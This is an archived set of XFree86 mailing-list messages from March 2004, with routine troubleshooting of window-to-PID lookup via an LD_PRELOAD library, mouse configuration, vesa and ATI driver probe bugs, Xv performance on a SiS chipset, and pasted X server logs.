don't know how to use the LD_PRELOAD hack to get the id of a process creating a window

2004-03-25 Thread dave giffin
I appreciate all the feedback from people so quickly
on my previous message.

I read Carsten Haitzler's message about creating a
library and getting x apps to load it via the
LD_PRELOAD environment variable.

This sounds like the best option for me.

But, I'm not sure how to actually do it. 

I compiled the library and set my LD_PRELOAD environ
variable to its path. Then i ran a copy of xterm and
used the code that Marcus Schaefer provided to get the
_NET_WM_PID property, but that property wasn't found.
I ran xterm under strace and it seems to open the
library I put into LD_PRELOAD.

Could someone provide some detailed instructions that
I could follow? 

(and possibly code, I haven't used LD_PRELOAD before
or done much programming directly w/ Xlib) 

:) thanx

__
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: how to convert a window ID to a linux process ID?

2004-03-25 Thread Marcus Schaefer
Hi,

 _NET_WM_PID is a VOLUNTARY property set by some apps if they want to.
 not all x  apps will set this - so windows wont necessarily have this
 property. see my LD_PRELOAD hack for forcing a process id property to
 be set on ALL toplevel windows of apps run under the preload

Yes now I undesrstand, the application I tried didn't implement the
_NET_WM_PID property. Well most of the gnome apps did so I tried one
of these and it works. Thanks for all the information

Regards
Marcus
-- 
 Public Key available
 
 Marcus Schäfer (Res.  Dev.)   SUSE LINUX AG
 Tel: 0911-740 53 0 Maxfeldstrasse 5
 FAX: 0911-741 77 55D-90409 Nürnberg
 http://www.suse.de Germany
 

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: how to convert a window ID to a linux process ID?

2004-03-25 Thread Rick Beldin
Perhaps some thought should be given to modify Xlib in a manner similar
to the way Xt is modified with the XtDebug resource.   It sets the
_MIT_OBJ_CLASS property on the window with the widget instance name and
the application class name.This is happening in Intrinsic.c in
RealizeWidget().
This approach would allow you to get pid information in the absence of
a window manager, such as when running apps rootless on a PC or in some
other constrained environment.
Rick

--
+--+
| Rick Beldin|  Hewlett-Packard Company|
| email: [EMAIL PROTECTED]  |  Global Solutions Engineering   |
||  20 Perimeter Summit|
+--+
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Bug: mailing list woes

2004-03-25 Thread Kean Johnston
Hi,

I am having a lot of trouble posting to this list. Only a subset of the 
messages I sent are making it back to me. I tried mailing postmaster, to 
no avail. Can someone look into what may be going wrong? Thank you.

Kean
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: Enabling mouse on X Server

2004-03-25 Thread Andrew E. Mileski
Suresh wrote:
I have ported X server on to my reference board based on Intel's Strong 
Arm,
When I connected a USB optical wheel mouse to the USB port the mouse 
doesn't work:
The mouse pointer appears on the screen,
dmesg cmd also show that the system has identified the device (including 
details like manufacturer etc)
But the GUI doesn't respond to the mouse.
I even tried linking  ln -s /dev/usb /dev/mouse but wouldn't work
 
has anyone face this problem and any idea how to locate the issue.
Thanks in Advance
If Linux, you are using the wrong device.

Section InputDevice
Identifier  Mouse0
Driver  mouse
Option  Protocol IMPS/2
Option  Device /dev/input/mice
Option  ZAxisMapping 4 5
Option  Emulate3Buttons no
EndSection
--
Andrew E. Mileski
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: Bug: mailing list woes

2004-03-25 Thread David Dawes
On Thu, Mar 25, 2004 at 12:03:44PM -0800, Kean Johnston wrote:
Hi,

I am having a lot of trouble posting to this list. Only a subset of the 
messages I sent are making it back to me. I tried mailing postmaster, to 
no avail. Can someone look into what may be going wrong? Thank you.

Do you know if the messages are making it to the list (check
mail-archive.com to see if they're there), or just not making it
back to you?

David
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: make install and nfs

2004-03-25 Thread David Dawes
On Thu, Mar 18, 2004 at 01:36:13PM -0500, David Dawes wrote:

On a thin client, one without development tools, it's `Cannot find a rule to
build /usr/include/stdio.h' and similar failures during the dependency 
checks.
The only way I see to stop these is for `make install' to not do 
dependency checks.
If I'm blind and there are other choices, that's ok too.

OK, for these external dependencies there probably isn't any other
option.  If nobody else has any input to add on this, we can go ahead
with that change.

I committed something based on your patch last night.  That fixes
installing from a read-only built tree for me.  Let me know if you find
any problems with it.

David
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


vesa and ati driver problems

2004-03-25 Thread Lee Olsen
Hello all;

A couple of things I found while sorting out multihead isa systems:

The vesa driver's probe looks like this:
   /* VGA has one more read/write attribute register than EGA */
   (void) inb(GenericIOBase + VGA_IN_STAT_1_OFFSET);  /* Reset flip-flop */
   outb(VGA_ATTR_INDEX, 0x14 | 0x20);
   CurrentValue = inb(VGA_ATTR_DATA_R);
   outb(VGA_ATTR_DATA_W, CurrentValue ^ 0x0F);
   outb(VGA_ATTR_INDEX, 0x14 | 0x20);
   TestValue = inb(VGA_ATTR_DATA_R);
   outb(VGA_ATTR_DATA_R, CurrentValue);
   /* Quit now if no VGA is present */
   if ((CurrentValue ^ 0x0F) != TestValue)
 return -1;
The last outb should be to VGA_ATTR_DATA_W rather  than R. Probing
without loading the vesa driver will do bad things (foreground = 
background) to
your display.

The ati driver does not do what you might expect when it finds a 
Graphics Ultra Pro
with the VGA turned off.  Configure sets up a screen and device for ati, 
but running
the server gives the error VGA is not available through this adapter. 
Since the
README.ati says stand alone 8514 is not supported, the server is right 
and configure
is wrong. The last test for a successful probe in atiprobe.c looks like 
this:

   if ((pATI-Adapter != ATI_ADAPTER_VGA) 
   ((pATI-Adapter != ATI_ADAPTER_8514A) ||
((pATI-VGAAdapter != ATI_ADAPTER_VGA) 
 (pATI-VGAAdapter != ATI_ADAPTER_NONE
Changing the second line to test pATI-ChipHasSUBSYS_CNTL will treat mach8
and mach32 as 8514 devices here. The third and fourth lines test if the 
VGA is disabled.
Enjoy
Lee

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


[XFree86] Asus Pundit and xv - what's your experience

2004-03-25 Thread Robert Rozman
Hi,

I'm recently posting about my problems with Asus Pundit slow xv performance
(Suse 9.0, P4 2.4G , xfree 4.4, sis 651 chipset - I get with xvtest around
200 FPS).

Obviously I have no obvious options to tackle this problem (Thomas ran out
of ideas), so would like to ask about your experiences, troubles, advices
with this machine/chipset and xv ? I had working configuration, but then did
security upgrades and it didn't work anymore (also after downgrade to
previous system). There are some suspects to o_sync wulnerability of Suse
systems, but how can I check that (cat proc/mtrr - anything else) ?

In my case everything seems fine from logs, just xv performance is bad
(x11perf gets better results 400/sec)...

Regards,

Robert.

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] .Xdefaults not taken

2004-03-25 Thread Edouard Debry
hello,

I put in one .Xdefaults some defaults parameters for xterm such as
reverseVideo (true) and so on ...


then I run the cmdline : xrdb -merge .Xdefaults, to load these defaults

but after this when for example typing xterm on cmd line, I realized
that my defaults were not taken into account, that is to say xterm was
not in reverseVideo as I set it by default

I was root when doing that and the  .Xdefaults file was in the directory
of root ( I mean not the root / directory )

can someone tell me what is wrong and what I have to do to make the
.Xdefaults be tken into account ?

thanks for your help
edouard
-- 
*-*
|  Edouard DEBRY  |
| Ph-D student at E.N.P.C - C.E.R.E.A   http://www.enpc.fr/cerea/ |
| |
| 21 Rue Nobel, Cité DescartesTEL  : 33 1 64 15 21 52 |
| 77455 CHAMPS SUR MARNE  MAIL : [EMAIL PROTECTED]  |
| |
| Thesis subject: MODELING OF AN ATMOSPHERIC AEROSOL DISTRIBUTION |
*-*
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] starting X from a script

2004-03-25 Thread Meghazi Fabien
Hi,

I try to start X from a script, but I get this message :

X: user not autorized to run the X server, aborting.

Did I miss somthing ? Should i export an ENV variable or something ?

--
Fabien Meghazi
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Asus Pundit and xv - what's your experience

2004-03-25 Thread Thomas Winischhofer
Robert Rozman wrote:
Hi,

I'm recently posting about my problems with Asus Pundit slow xv performance
(Suse 9.0, P4 2.4G , xfree 4.4, sis 651 chipset - I get with xvtest around
200 FPS).
Obviously I have no obvious options to tackle this problem (Thomas ran out
of ideas), so would like to ask about your experiences, troubles, advices
with this machine/chipset and xv ? I had working configuration, but then did
security upgrades and it didn't work anymore (also after downgrade to
previous system). There are some suspects to o_sync wulnerability of Suse
systems, but how can I check that (cat proc/mtrr - anything else) ?
In my case everything seems fine from logs, just xv performance is bad
(x11perf gets better results 400/sec)...
Strictly speaking, it is not xv performance but memcpy() performance.

I have a pundit myself and I don't experience that problem (using 
Debian's 4.3 packages)

Thomas

--
Thomas Winischhofer
Vienna/Austria
thomas AT winischhofer DOT net *** http://www.winischhofer.net
twini AT xfree86 DOT org
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] No Cursor

2004-03-25 Thread Jean Krebs Fonseca
Thanks for the answers, it should not be difficult. But I'll try Mark's tip 
first, to use xsetroot, since I'm gonna write the application myself, so I 
won't render a cursor from there.

On Wednesday 24 March 2004 17:44, Kelvin wrote:
 On Wed, Mar 24, 2004 at 09:24:42AM -0300, Jean Krebs Fonseca wrote:
  Does anybody know a way to prevent the cursor of being rendered?
  I've already disabled the mouse and added AllowMouseOpenFail. The X
  Server starts fine with no mouse movement, but the cursor is still there.
 
  I need this because I'm rendering a non-interactive information display
  system.

 I had a similiar requirement a few weeks ago. Here was Mark Vojkovich's
 solution - it work perfectly for me. Basically, you need to hack the X
 server. Edit the CheckForEmptyMask function located in the
 dix/cursor.c file; set the line bits-emptyMask to always evaluate to TRUE.

 Re-compile and install. It's that easy.

-- 
Jean Krebs Fonseca
jean (at) vader dot com dot br
www.vader.com.br
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] crash with 4.4.0

2004-03-25 Thread Bryan Gin-ge Chen
x server crashes after running glxinfo, but not if I run glxgears first...

Another new issue is the warning:
(WW) TRIDENT(0): Failed to set up write-combining range 
(0xfc00,0x200)
In the kernel log, it displays:
Mar 25 07:00:29 gin-ge kernel: mtrr: 0xfc00,0x200 overlaps 
existing 0xfc00,0x100

Is there anything else I should provide?

Bryan Chen
_XSERVTransSocketOpenCOTSServer: Unable to open socket for inet6
_XSERVTransOpen: transport open failed for inet6/gin-ge:0
_XSERVTransMakeAllCOTSServerListeners: failed to open listener for inet6

XFree86 Version 4.4.0
Release Date: 29 February 2004
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.25 i686 [ELF] 
Current Operating System: Linux gin-ge 2.6.4 #1 SMP Sun Mar 21 04:08:08 EST 2004 i686
Build Date: 21 March 2004
Changelog Date: 29 February 2004
Before reporting problems, check http://www.XFree86.Org/
to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: /var/log/XFree86.0.log, Time: Thu Mar 25 06:58:29 2004
(==) Using config file: /etc/X11/XF86Config
(==) ServerLayout Simple Layout
(**) |--Screen Screen 1 (0)
(**) |   |--Monitor My Monitor
(**) |   |--Device Trident CyberBlade (generic)
(**) |--Input Device Mouse1
(**) |--Input Device Keyboard1
(**) Option AutoRepeat 500 30
(**) Option XkbRules xfree86
(**) XKB: rules: xfree86
(**) Option XkbModel pc101
(**) XKB: model: pc101
(**) Option XkbLayout us
(**) XKB: layout: us
(==) Keyboard: CustomKeycode disabled
(**) FontPath set to 
/tmp,/usr/X11R6/lib/X11/fonts/TTF,/usr/X11R6/lib/X11/fonts/TrueType,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/CID/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,unix/:7100
(**) RgbPath set to /usr/X11R6/lib/X11/rgb
(==) ModulePath set to /usr/X11R6/lib/modules
(WW) Open APM failed (/dev/apm_bios) (No such device)
(II) Module ABI versions:
XFree86 ANSI C Emulation: 0.2
XFree86 Video Driver: 0.7
XFree86 XInput driver : 0.4
XFree86 Server Extension : 0.2
XFree86 Font Renderer : 0.4
(II) Loader running on linux
(II) LoadModule: bitmap
(II) Loading /usr/X11R6/lib/modules/fonts/libbitmap.a
(II) Module bitmap: vendor=The XFree86 Project
compiled for 4.4.0, module version = 1.0.0
Module class: XFree86 Font Renderer
ABI class: XFree86 Font Renderer, version 0.4
(II) Loading font Bitmap
(II) LoadModule: pcidata
(II) Loading /usr/X11R6/lib/modules/libpcidata.a
(II) Module pcidata: vendor=The XFree86 Project
compiled for 4.4.0, module version = 1.0.0
ABI class: XFree86 Video Driver, version 0.7
(--) using VT number 7

(II) PCI: Probing config type using method 1
(II) PCI: Config type is 1
(II) PCI: stages = 0x03, oldVal1 = 0x, mode1Res1 = 0x8000
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:00:0: chip 10b9,1672 card 1179,0001 rev 00 class 06,00,00 hdr 00
(II) PCI: 00:01:0: chip 10b9,5247 card , rev 00 class 06,04,00 hdr 01
(II) PCI: 00:04:0: chip 10b9,5229 card 1179,0004 rev c4 class 01,01,f0 hdr 00
(II) PCI: 00:06:0: chip 10b9,5451 card 1179,0221 rev 02 class 04,01,00 hdr 00
(II) PCI: 00:07:0: chip 10b9,1533 card 1179,0004 rev 00 class 06,01,00 hdr 00
(II) PCI: 00:08:0: chip 10b9,7101 card 1179,0001 rev 00 class 06,80,00 hdr 00
(II) PCI: 00:09:0: chip 10b9,5457 card 1179,0001 rev 00 class 07,03,00 hdr 00
(II) PCI: 00:0a:0: chip 10ec,8139 card 1179,0002 rev 10 class 02,00,00 hdr 00
(II) PCI: 00:0c:0: chip 1033,0035 card 1179,0003 rev 43 class 0c,03,10 hdr 80
(II) PCI: 00:0c:1: chip 1033,0035 card 1179,0003 rev 43 class 0c,03,10 hdr 00
(II) PCI: 00:0c:2: chip 1033,00e0 card 1179,0001 rev 04 class 0c,03,20 hdr 00
(II) PCI: 00:10:0: chip 104c,ac50 card 4000, rev 01 class 06,07,00 hdr 02
(II) PCI: 00:11:0: chip 1179,0617 card 4800, rev 33 class 06,07,00 hdr 02
(II) PCI: 00:12:0: chip 1179,0805 card 1179,0001 rev 05 class 08,80,00 hdr 00
(II) PCI: 01:00:0: chip 1023,8820 card 1179,0001 rev 82 class 03,00,00 hdr 00
(II) PCI: End of PCI scan
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:0:0), (0,0,6), BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
[0] -1  0   0x - 0x (0x1) IX[B]
(II) Bus 0 non-prefetchable memory range:
[0] -1  0   0x - 0x (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
[0] -1  0   0x - 0x (0x0) MX[B]
(II) PCI-to-PCI bridge:
(II) Bus 1: bridge is at (0:1:0), (0,1,1), BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 1 non-prefetchable memory range:
[0] -1  0   0xf7f0 - 0xfdff (0x610) MX[B]
(II) PCI-to-ISA bridge:
(II) Bus -1: bridge is at (0:7:0), 

Re: [XFree86] Asus Pundit (sis 651) : High CPU usage in xv ? - solved

2004-03-25 Thread Robert Rozman
Hi,

I've solved my problems. I've searched faqs and found this one:
  a.. Xv is terribly slow and takes 30% CPU time or more. What's wrong?
  b.. As of 06/05/2003, there is a confirmed bug in the SuSE 8.2 XFree 4.3
packages and probably in XFree 4.3 packages of some other distributions as
well. I know of at least Debian's 4.3.0pre1v1 containing this bug, too. This
is no SiS driver bug and there is no real workaround available. However, on
some systems, especially Athlon based ones, it helps setting the option
XvUseMemcpy to false. Later versions of XFree86 will hopefully fix this
problem rendering this option unneccessary. (Technical explanation: There is
a problem with memory access in these versions of XFree86, rendering
memcpy-operations to video RAM extremely slow. SiS hardware is not the only
one affected, there were numerous complaints from users of other hardware,
too. This bug is also known as the O_SYNC bug. If you want to know more,
search the archive of the xdevel mailing list for a thread named Athlon
related mystery.)
Setting  XvUseMemcpy to 0 solved my problems. It seems that this setting is
still important (I have Suse 9.0, xfree 4.4 and still had problems).

Thanks to Thomas for this info.

Regards,

Robert.

- Original Message - 
From: Robert Rozman [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, March 19, 2004 11:58 PM
Subject: Re: [XFree86] Asus Pundit (sis 651) : High CPU usage in xv ?


 Hi,

 I have upgraded to xfree 4.4 (also latest sis_drv.o) and it doesn't help
(at
 least in noticeable way) - cpu is still high, xvtest gives around 220 FPS

 I'm attaching log and kindly ask for any idea, help or advice how to solve
 this. Are there any tools to properly track this problem inside xv ?


 Thanks in advance,

 regards,

 Robert Rozman

 - Original Message - 
 From: Robert Rozman [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Thursday, March 18, 2004 9:38 AM
 Subject: Re: [XFree86] Asus Pundit (sis 651) : High CPU usage in xv ?


  Hi,
 
  I'm still fighting with high cpu usage in xv extension whem playing
media
  files (xine, mplayer, vlc) under Suse 9.0 , xfree 4.3.0-29 and sis 651
 with
  latest sis drivers.
 
  All log outputs seems fine, just xvtest is at low 200 FPS and cpu is hig
  (30-50%) when playing video that does rescaling.
 
  Are there any utities to check what is going on in xv extension
 (xine-check
  reports all fine) ?
  What should I try to find solution ?
 
  I'm attaching xvinfo (all other relevant logs are attached to my
previous
  posts) if anything suspicious is in there ?
 
  PS.: system performance was OKsome time ago, then did some upgrades and
 now
  it won't perform as needed - so I guess there is someking of settings
  problem...
 
  I kindly ask for any advice, help, cause this is too hard for me as
 newbie.
 
  Thanks for any help in advance,
 
  regards,
 
  Robert.
 
  - Original Message - 
  From: Robert Rozman [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Sent: Tuesday, March 16, 2004 10:39 AM
  Subject: Re: [XFree86] Asus Pundit (sis 651) : High CPU usage for X in
  mplayer - are these values sane ?
 
 
   Hi,
  
   I've tried reduceing memory to 32M in bios.
  
   That particular warning goes away, but high cpu problem persists.
  
   Short answers:
 cat /proc/mtrr 
 reg00: base=0x (   0MB), size= 512MB: write-back, count=1
 reg01: base=0x1c00 ( 448MB), size=  64MB: uncachable, count=1
 reg02: base=0xdc00 (3520MB), size=  64MB: write-combining,
 count=1
 reg03: base=0xe800 (3712MB), size=  32MB: write-combining,
 count=1
 reg04: base=0xe140 (3604MB), size=   4MB: write-combining,
 count=1
   
Is that from before or after starting X?
   
   After starting X.
  
Do you have a console framebuffer driver running?
   
  
   Probably is running from bootsplash feature integrated in Suse 9.0
  
  (WW) SIS(0): Failed to set up write-combining range
(0xe800,0x400)
   
The reason for your problem is that, for some reason, MTRR setup
 fails,
although it obviously is supported by your kernel. At the moment I
cannot think of a reason for this.
   
Does this warning message go away if you change the amount of video
 RAM
to, say, 32MB in the BIOS setup?
  
   Yes, it goes away.
  
   
(BTW: Why do you set forcecrt1 to false when it appears that you
neither have a TV, LCD or secondary VGA connected?)
   There is note in example-config that one can override automatic
 detection
   with this one. I've commented it our, but no difference.
  
   I'm attaching new Xfree.log in case it helps.
  
   Thanks in advance for all help,
  
   Robert.
  
  
   - Original Message - 
   From: Thomas Winischhofer [EMAIL PROTECTED]
   To: [EMAIL PROTECTED]
   Sent: Monday, March 15, 2004 1:12 AM
   Subject: Re: [XFree86] Asus Pundit (sis 651) : High CPU usage for X in
   mplayer - are these values sane ?
  
  
Robert Rozman wrote:
 Hi,
  

[XFree86] end of block range 0xffb begin 0xfffffffc ???????

2004-03-25 Thread hAPPY-j
This is a pre-release version of XFree86, and is not supported in any
way.  Bugs may be reported to [EMAIL PROTECTED] and patches submitted
to [EMAIL PROTECTED]  Before reporting bugs in pre-release versions,
please check the latest version in the XFree86 CVS repository
(http://www.XFree86.Org/cvs).
XFree86 Version 4.3.0.1
Release Date: 15 August 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.6.4-rc1 i686 [ELF]
Build Date: 22 March 2004
   Before reporting problems, check http://www.XFree86.Org/
   to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: /var/log/XFree86.0.log, Time: Thu Mar 25 20:49:11 2004
(==) Using config file: /etc/X11/XF86Config
(==) ServerLayout Simple Layout
(**) |--Screen Screen 1 (0)
(**) |   |--Monitor iiyama
(**) |   |--Device gforce2
(**) |--Input Device Mouse1
(**) |--Input Device Keyboard1
(**) Option AutoRepeat 500 30
(**) Option XkbRules xfree86
(**) XKB: rules: xfree86
(**) Option XkbModel pc105
(**) XKB: model: pc105
(**) Option XkbLayout fr
(**) XKB: layout: fr
(**) Option XkbVariant fr-pc
(**) XKB: variant: fr-pc
(==) Keyboard: CustomKeycode disabled
(**) FontPath set to 
/usr/X11R6/lib/X11/fonts/local/,/usr/X11R6/lib/X11/fonts/m
isc/,/usr/X11R6/lib/X11/fonts/75dpi/:unscaled,/usr/X11R6/lib/X11/fonts/100dpi/:u
nscaled,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/Type1/,/usr/X1
1R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/
(**) RgbPath set to /usr/X11R6/lib/X11/rgb
(==) ModulePath set to /usr/X11R6/lib/modules
Using vt 7
(--) using VT number 7

(WW) Open APM failed (/dev/apm_bios) (No such file or directory)
(II) Module ABI versions:
   XFree86 ANSI C Emulation: 0.2
   XFree86 Video Driver: 0.6
   XFree86 XInput driver : 0.4
   XFree86 Server Extension : 0.2
   XFree86 Font Renderer : 0.4
(II) Loader running on linux
(II) LoadModule: bitmap
(II) Loading /usr/X11R6/lib/modules/fonts/libbitmap.a
(II) Module bitmap: vendor=The XFree86 Project
   compiled for 4.3.0.1, module version = 1.0.0
   Module class: XFree86 Font Renderer
   ABI class: XFree86 Font Renderer, version 0.4
(II) Loading font Bitmap
(II) LoadModule: pcidata
(II) Loading /usr/X11R6/lib/modules/libpcidata.a
(II) Module pcidata: vendor=The XFree86 Project
   compiled for 4.3.0.1, module version = 1.0.0
   ABI class: XFree86 Video Driver, version 0.6
(II) PCI: Probing config type using method 1
(II) PCI: Config type is 1
(II) PCI: stages = 0x03, oldVal1 = 0x, mode1Res1 = 0x8000
(II) PCI: PCI scan (all values are in hex)
(II) PCI: 00:00:0: chip 8086,1130 card 1043,8027 rev 02 class 06,00,00 
hdr 00
(II) PCI: 00:01:0: chip 8086,1131 card , rev 02 class 06,04,00 
hdr 01
(II) PCI: 00:1e:0: chip 8086,244e card , rev 02 class 06,04,00 
hdr 01
(II) PCI: 00:1f:0: chip 8086,2440 card , rev 02 class 06,01,00 
hdr 80
(II) PCI: 00:1f:1: chip 8086,244b card 1043,8027 rev 02 class 01,01,80 
hdr 00
(II) PCI: 00:1f:2: chip 8086,2442 card 1043,8027 rev 02 class 0c,03,00 
hdr 00
(II) PCI: 00:1f:3: chip 8086,2443 card 1043,8027 rev 02 class 0c,05,00 
hdr 00
(II) PCI: 00:1f:4: chip 8086,2444 card 1043,8027 rev 02 class 0c,03,00 
hdr 00
(II) PCI: 01:00:0: chip 10de,0150 card 10de,0021 rev a3 class 03,00,00 
hdr 00
(II) PCI: 02:09:0: chip , card , rev ff class ff,ff,ff 
hdr 00
(II) PCI: 02:0c:0: chip 10b7,9050 card , rev 00 class 02,00,00 
hdr 00
(II) PCI: 02:0d:0: chip 1102,0002 card 1102,8026 rev 07 class 04,01,00 
hdr 80
(II) PCI: 02:0d:1: chip 1102,7002 card 1102,0020 rev 07 class 09,80,00 
hdr 80
(II) PCI: End of PCI scan
(II) Host-to-PCI bridge:
(II) Bus 0: bridge is at (0:0:0), (0,0,2), BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 0 I/O range:
   [0] -1  0   0x - 0x (0x1) IX[B]
(II) Bus 0 non-prefetchable memory range:
   [0] -1  0   0x - 0x (0x0) MX[B]
(II) Bus 0 prefetchable memory range:
   [0] -1  0   0x - 0x (0x0) MX[B]
(II) PCI-to-PCI bridge:
(II) Bus 1: bridge is at (0:1:0), (0,1,1), BCTRL: 0x0008 (VGA_EN is set)
(II) Bus 1 non-prefetchable memory range:
   [0] -1  0   0xee00 - 0xefdf (0x1e0) MX[B]
(II) Bus 1 prefetchable memory range:
   [0] -1  0   0xeff0 - 0xf7ff (0x810) MX[B]
(II) PCI-to-PCI bridge:
(II) Bus 2: bridge is at (0:30:0), (0,2,2), BCTRL: 0x0006 (VGA_EN is 
cleared)
(II) Bus 2 I/O range:
   [0] -1  0   0xb000 - 0xb0ff (0x100) IX[B]
   [1] -1  0   0xb400 - 0xb4ff (0x100) IX[B]
   [2] -1  0   0xb800 - 0xb8ff (0x100) IX[B]
   [3] -1  0   0xbc00 - 0xbcff (0x100) IX[B]
   [4] -1  0   0xc000 - 0xc0ff (0x100) IX[B]
   [5] -1  0 

Re: [XFree86] end of block range 0xffb begin 0xfffffffc ???????

2004-03-25 Thread Mark Vojkovich
   There's not really enough info to go on there, but it looks like
a motherboard BIOS bug.  Can we see the output of /proc/pci ?
Whatever is at 0xf800 (not the video card) seems to be
overlapping another device.  The server quit before enough info
was printed out to determine which devices.

Mark.

On Thu, 25 Mar 2004, hAPPY-j wrote:

 This is a pre-release version of XFree86, and is not supported in any
 way.  Bugs may be reported to [EMAIL PROTECTED] and patches submitted
 to [EMAIL PROTECTED]  Before reporting bugs in pre-release versions,
 please check the latest version in the XFree86 CVS repository
 (http://www.XFree86.Org/cvs).

 XFree86 Version 4.3.0.1
 Release Date: 15 August 2003
 X Protocol Version 11, Revision 0, Release 6.6
 Build Operating System: Linux 2.6.4-rc1 i686 [ELF]
 Build Date: 22 March 2004
 Before reporting problems, check http://www.XFree86.Org/
 to make sure that you have the latest version.
 Module Loader present
 Markers: (--) probed, (**) from config file, (==) default setting,
  (++) from command line, (!!) notice, (II) informational,
  (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
 (==) Log file: /var/log/XFree86.0.log, Time: Thu Mar 25 20:49:11 2004
 (==) Using config file: /etc/X11/XF86Config
 (==) ServerLayout Simple Layout
 (**) |--Screen Screen 1 (0)
 (**) |   |--Monitor iiyama
 (**) |   |--Device gforce2
 (**) |--Input Device Mouse1
 (**) |--Input Device Keyboard1
 (**) Option AutoRepeat 500 30
 (**) Option XkbRules xfree86
 (**) XKB: rules: xfree86
 (**) Option XkbModel pc105
 (**) XKB: model: pc105
 (**) Option XkbLayout fr
 (**) XKB: layout: fr
 (**) Option XkbVariant fr-pc
 (**) XKB: variant: fr-pc
 (==) Keyboard: CustomKeycode disabled
 (**) FontPath set to
 /usr/X11R6/lib/X11/fonts/local/,/usr/X11R6/lib/X11/fonts/m
 isc/,/usr/X11R6/lib/X11/fonts/75dpi/:unscaled,/usr/X11R6/lib/X11/fonts/100dpi/:u
 nscaled,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/Type1/,/usr/X1
 1R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/
 (**) RgbPath set to /usr/X11R6/lib/X11/rgb
 (==) ModulePath set to /usr/X11R6/lib/modules
 Using vt 7
 (--) using VT number 7

 (WW) Open APM failed (/dev/apm_bios) (No such file or directory)
 (II) Module ABI versions:
 XFree86 ANSI C Emulation: 0.2
 XFree86 Video Driver: 0.6
 XFree86 XInput driver : 0.4
 XFree86 Server Extension : 0.2
 XFree86 Font Renderer : 0.4
 (II) Loader running on linux
 (II) LoadModule: bitmap
 (II) Loading /usr/X11R6/lib/modules/fonts/libbitmap.a
 (II) Module bitmap: vendor=The XFree86 Project
 compiled for 4.3.0.1, module version = 1.0.0
 Module class: XFree86 Font Renderer
 ABI class: XFree86 Font Renderer, version 0.4
 (II) Loading font Bitmap
 (II) LoadModule: pcidata
 (II) Loading /usr/X11R6/lib/modules/libpcidata.a
 (II) Module pcidata: vendor=The XFree86 Project
 compiled for 4.3.0.1, module version = 1.0.0
 ABI class: XFree86 Video Driver, version 0.6
 (II) PCI: Probing config type using method 1
 (II) PCI: Config type is 1
 (II) PCI: stages = 0x03, oldVal1 = 0x, mode1Res1 = 0x8000
 (II) PCI: PCI scan (all values are in hex)
 (II) PCI: 00:00:0: chip 8086,1130 card 1043,8027 rev 02 class 06,00,00
 hdr 00
 (II) PCI: 00:01:0: chip 8086,1131 card , rev 02 class 06,04,00
 hdr 01
 (II) PCI: 00:1e:0: chip 8086,244e card , rev 02 class 06,04,00
 hdr 01
 (II) PCI: 00:1f:0: chip 8086,2440 card , rev 02 class 06,01,00
 hdr 80
 (II) PCI: 00:1f:1: chip 8086,244b card 1043,8027 rev 02 class 01,01,80
 hdr 00
 (II) PCI: 00:1f:2: chip 8086,2442 card 1043,8027 rev 02 class 0c,03,00
 hdr 00
 (II) PCI: 00:1f:3: chip 8086,2443 card 1043,8027 rev 02 class 0c,05,00
 hdr 00
 (II) PCI: 00:1f:4: chip 8086,2444 card 1043,8027 rev 02 class 0c,03,00
 hdr 00
 (II) PCI: 01:00:0: chip 10de,0150 card 10de,0021 rev a3 class 03,00,00
 hdr 00
 (II) PCI: 02:09:0: chip , card , rev ff class ff,ff,ff
 hdr 00
 (II) PCI: 02:0c:0: chip 10b7,9050 card , rev 00 class 02,00,00
 hdr 00
